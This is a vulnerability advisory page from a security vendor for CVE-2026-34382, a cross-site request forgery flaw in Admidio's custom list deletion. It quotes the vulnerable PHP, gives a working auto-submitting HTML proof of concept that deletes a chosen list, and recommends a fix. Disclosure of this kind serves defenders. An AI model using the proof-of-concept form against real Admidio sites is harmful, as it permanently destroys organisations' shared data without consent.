Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-34382 — admidio

🟡 CVSS 4.6 — Medium ⚠️ Exploit Public CWE-352 NVD
4.6
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Admidio has Missing CSRF Protections on Custom List Deletion in mylist_function.php

Reported by: Juan Felipe Oz [@JF0x0r](https://x.com/PwnedRar_)

> [LinkedIn](https://www.linkedin.com/in/juanfelipeoz/)

Summary

The delete mode handler in mylist_function.php permanently deletes list configurations without validating a CSRF token. An attacker who can lure an authenticated user to a malicious page can silently destroy that user's list configurations — including organization-wide shared lists when the victim holds administrator rights.

Vulnerable Code

File: modules/groups-roles/mylist_function.php

The CSRF token validation at lines 81–82 is scoped exclusively to the save, save_as, and save_temporary modes:

```php

// Line 81-82 — only runs for save modes

$categoryReportConfigForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);

if ($_POST['adm_csrf_token'] !== $categoryReportConfigForm->getCsrfToken()) {

throw new Exception('Invalid or missing CSRF token!');

}

```

<img width="857" height="162" alt="imagen" src="https://github.com/user-attachments/assets/caec390e-ba6f-40f0-bb9c-a8870679da3d" />

The delete case at lines 159–161 executes the destructive operation with no token check:

```php

} elseif ($getMode === 'delete') {

// delete list configuration

$list->delete(); // no CSRF validation

echo json_encode(array('status' => 'success', ...));

exit();

}

```

<img width="560" height="133" alt="imagen" src="https://github.com/user-attachments/assets/2d5eff8e-bbce-49b9-b6d5-77f4e2e6db69" />

A global input guard at lines 40–48 requires a non-empty column[] POST parameter for all modes including delete. This guard serves no security purpose for deletion, it exists for save validation but it must be satisfied to reach the delete handler. Any static value such as LAST_NAME is sufficient.

Impact

Any authenticated user with list edit permission can be targeted. Admidio ships with six organization-wide shared lists (lst_global = 1): Address list, Phone list, Contact information, Membership, Members, and Contacts. When an administrator is the CSRF victim, these global lists are permanently deleted affecting all members of the organization. There is no soft-delete or recovery mechanism.

Proof of Concept

> First my video PoC, after that, the proof of concept with detail.

[Watch Video](https://drive.google.com/file/d/1wEdTIH7O0PvlnyjR2I_VpcAl3tvr6saA/view?usp=sharing)

  • Prerequisites: Victim is authenticated in Admidio. Attacker knows the target list UUID (visible in the page URL at modules/groups-roles/mylist.php?list_uuid=...)

1. Step 1: Attacker serves this page from any HTTP origin:

```html

<!DOCTYPE html>

<html>

<body>

<form id="f" method="POST"

action="http://TARGET/modules/groups-roles/mylist_function.php?mode=delete&list_uuid=TARGET_UUID">

<input type="hidden" name="column[]" value="LAST_NAME">

</form>

<script>document.getElementById('f').submit();</script>

</body>

</html>

```

> Since browsers block CSRF files, I did the proof of concept by setting up a local server with Python on the 9090. ok?

2. Step 2: Victim visits the attacker page while logged into Admidio.

3. Step 3: Server responds immediately:

```json

{"status":"success","url":".../modules/groups-roles/mylist.php"}

```

4. Step 4: List is permanently deleted. Verified via:

```sql

SELECT lst_name FROM adm_lists WHERE lst_uuid='TARGET_UUID';

-- Empty result set

```

> No adm_csrf_token field is required anywhere in the request.

Recommendation Fix:

> It's so simple.

  • Apply the same SecurityUtils::validateCsrfToken() pattern already used in the save modes:

```php

} elseif ($getMode === 'delete') {

SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);

$list->delete();

echo json_encode(array('status' => 'success', ...));

exit();

}

```

Additionally, the column[] input guard at lines 40–48 should be moved inside the in_array($getMode, ['save', 'save_as', 'save_temporary']) block, since delete requires no column data and the guard currently forces attackers to include a trivially satisfiable dummy value.

<img width="751" height="240" alt="imagen" src="https://github.com/user-attachments/assets/607510b9-64a9-49fb-8806-604b651d31a8" />

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity low, availability low.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: Low — an ordinary user account is enough.
  • User interaction: Required — someone has to click, open or visit something.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: None.
  • Integrity impact: Low — limited, and the attacker does not choose what is affected.
  • Availability impact: Low — limited, and the attacker does not choose what is affected.

Weakness class

CVE-2026-34382 is classified as CWE-352: Cross-Site Request Forgery (CSRF). A state-changing request is accepted without proof it was intended, so another site can trigger it using the victim's session.

Affected software

CVE-2026-34382 is recorded against 2 packages.

  • admidio (from 5.0.0 up to 5.0.8)
  • admidio/admidio (from 5.0.0 up to 5.0.8)

Timeline and source

Published on 31 March 2026 and last revised on 24 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com

Other advisories for this package

admidio has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-352: Cross-Site Request Forgery (CSRF)) in other software:

Details

Severity MEDIUM
CVSS Score 4.6
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L
CWE CWE-352
Public Exploit ⚠️ Yes
Source NVD
Published 2026-03-31
Updated 2026-08-20
Modified 2026-07-24

Affected Packages

Software From version Fixed in
admidio 5.0.0 5.0.8
admidio/admidio 5.0.0 5.0.8

Similar Threats

Exploit Protection

Are you running admidio?

CVE-2026-34382 carries CVSS 4.6 Medium rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-34382 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026